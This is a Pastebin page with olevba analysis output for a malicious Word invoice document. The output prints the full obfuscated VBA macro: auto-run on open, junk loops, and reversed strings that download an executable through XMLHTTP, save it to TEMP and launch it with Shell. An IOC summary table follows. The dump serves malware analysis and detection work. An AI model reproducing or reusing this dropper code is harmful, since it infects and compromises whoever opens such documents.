Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIHB-V invoic~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: invoic~1.doc
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub JSUrgGsyv()
- 'tmpo22
- Dim JdgReyjd As Integer
- Dim ShdwdjJds As Integer
- ShdwdjJds = 6
- Do While ShdwdjJds < 59
- DoEvents: ShdwdjJds = ShdwdjJds + 1
- Loop
- JdgReyjd = 4
- Do While JdgReyjd < 81
- Dim uYetBsjfhs As Integer
- uYetBsjfhs = 8
- Do While uYetBsjfhs < 72
- DoEvents: uYetBsjfhs = uYetBsjfhs + 1
- Loop
- DoEvents: JdgReyjd = JdgReyjd + 1
- Loop
- Dim PsiosJstwvd As Integer
- PsiosJstwvd = 2
- Do While PsiosJstwvd < 25
- DoEvents: PsiosJstwvd = PsiosJstwvd + 1
- Loop
- UIkcdidYs
- End Sub
- Sub AutoOpen()
- Dim iUwuUWuxc As Integer
- Dim pojxwSdc As Integer
- pojxwSdc = 4
- Do While pojxwSdc < 77
- DoEvents: pojxwSdc = pojxwSdc + 1
- Loop
- iUwuUWuxc = 6
- Do While iUwuUWuxc < 29
- Dim FoewfdSy As Integer
- FoewfdSy = 9
- Do While FoewfdSy < 34
- DoEvents: FoewfdSy = FoewfdSy + 1
- Loop
- DoEvents: iUwuUWuxc = iUwuUWuxc + 1
- Loop
- Dim AdhsajhEc As Integer
- AdhsajhEc = 7
- Do While AdhsajhEc < 89
- DoEvents: AdhsajhEc = AdhsajhEc + 1
- Loop
- JSUrgGsyv
- End Sub
- Sub Workbook_Open()
- Dim IowxJDdsr As Integer
- Dim bGdkaJjdsd As Integer
- bGdkaJjdsd = 4
- Do While bGdkaJjdsd < 71
- DoEvents: bGdkaJjdsd = bGdkaJjdsd + 1
- Loop
- IowxJDdsr = 5
- Do While IowxJDdsr < 75
- Dim wSfowpcD As Integer
- wSfowpcD = 7
- Do While wSfowpcD < 88
- DoEvents: wSfowpcD = wSfowpcD + 1
- Loop
- DoEvents: IowxJDdsr = IowxJDdsr + 1
- Loop
- Dim iAcvpaJHdc As Integer
- iAcvpaJHdc = 6
- Do While iAcvpaJHdc < 56
- DoEvents: iAcvpaJHdc = iAcvpaJHdc + 1
- Loop
- JSUrgGsyv
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO trekdddjvjb.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/trekdddjvjb'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function oPlKtRebGf()
- hyyuejkjs = "/x16"
- yyeidsadf = "56/d"
- iuyhgdfsdf = oGdyeJdhsdd.TextBox1
- yeuijjffsa = "fiubgh5.exe"
- oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO oerdkaksnc.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/oerdkaksnc'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function nHdiPwTgFsd()
- nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO jduyewiskd.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/jduyewiskd'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function uYtbdTsc()
- uYtbdTsc = StrReverse("PMET")
- End Function
- Public Function IdjcTrsj()
- IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
- End Function
- Public Function ThWockSv()
- ThWockSv = StrReverse("maertS.BDODA")
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO aIuhYqZk.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/aIuhYqZk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub UIkcdidYs()
- Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)
- Dim uehdbcxsd As Integer
- uehdbcxsd = 7
- Do While uehdbcxsd < 66
- DoEvents: uehdbcxsd = uehdbcxsd + 1
- Loop
- dsfgty.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False
- Dim kiwqazbcf As Integer
- kiwqazbcf = 5
- Do While kiwqazbcf < 78
- DoEvents: kiwqazbcf = kiwqazbcf + 1
- Loop
- dsfgty.send
- Dim ieywhdcba As Integer
- ieywhdcba = 9
- Do While ieywhdcba < 38
- DoEvents: ieywhdcba = ieywhdcba + 1
- Loop
- uwopdhftes dsfgty
- Dim tRekfhgwv As Integer
- tRekfhgwv = 9
- Do While tRekfhgwv < 82
- DoEvents: tRekfhgwv = tRekfhgwv + 1
- Loop
- Shell oGdyeJdhsdd.bhjsdfvcjdds
- End Sub
- Function uwopdhftes(ByVal jfytwjhdb)
- Set xxxcvcxvb = CreateObject(jduyewiskd.ThWockSv)
- Dim OpHfreohd As Integer
- OpHfreohd = 4
- Do While OpHfreohd < 54
- DoEvents: OpHfreohd = OpHfreohd + 1
- Loop
- xxxcvcxvb.Open
- Dim IuwSjskwq As Integer
- IuwSjskwq = 4
- Do While IuwSjskwq < 67
- DoEvents: IuwSjskwq = IuwSjskwq + 1
- Loop
- xxxcvcxvb.Type = 2 - 1
- Dim jHewysLd As Integer
- jHewysLd = 7
- Do While jHewysLd < 84
- DoEvents: jHewysLd = jHewysLd + 1
- Loop
- xxxcvcxvb.Write jfytwjhdb.responseBody
- Dim oYeBsdhd As Integer
- oYeBsdhd = 4
- Do While oYeBsdhd < 76
- DoEvents: oYeBsdhd = oYeBsdhd + 1
- Loop
- xxxcvcxvb.SaveToFile oerdkaksnc.nHdiPwTgFsd, 3 - 1
- Dim YrtGfdvzw As Integer
- YrtGfdvzw = 6
- Do While YrtGfdvzw < 63
- DoEvents: YrtGfdvzw = YrtGfdvzw + 1
- Loop
- xxxcvcxvb.Close
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO oGdyeJdhsdd.frm
- in file: word/vbaProject.bin - OLE stream: u'VBA/oGdyeJdhsdd'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub TextBox1_Change()
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class6.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class7.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class7'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class8.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class9.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class10.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/Class10'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | fiubgh5.exe | Executable file name |
- | VBA string | /shereder | Chr$(47) & Chr$(115) & Chr$(104) & |
- | | | Chr$(101) & Chr$(114) & Chr$(101) & |
- | | | Chr$(100) & Chr$(101) & Chr$(114) |
- | VBA string | TEMP | StrReverse("PMET") |
- | VBA string | Microsoft.XMLHTTP | StrReverse("PTTHLMX.tfosorciM") |
- | VBA string | ADODB.Stream | StrReverse("maertS.BDODA") |
- | VBA string | POST | StrReverse("TSOP") |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement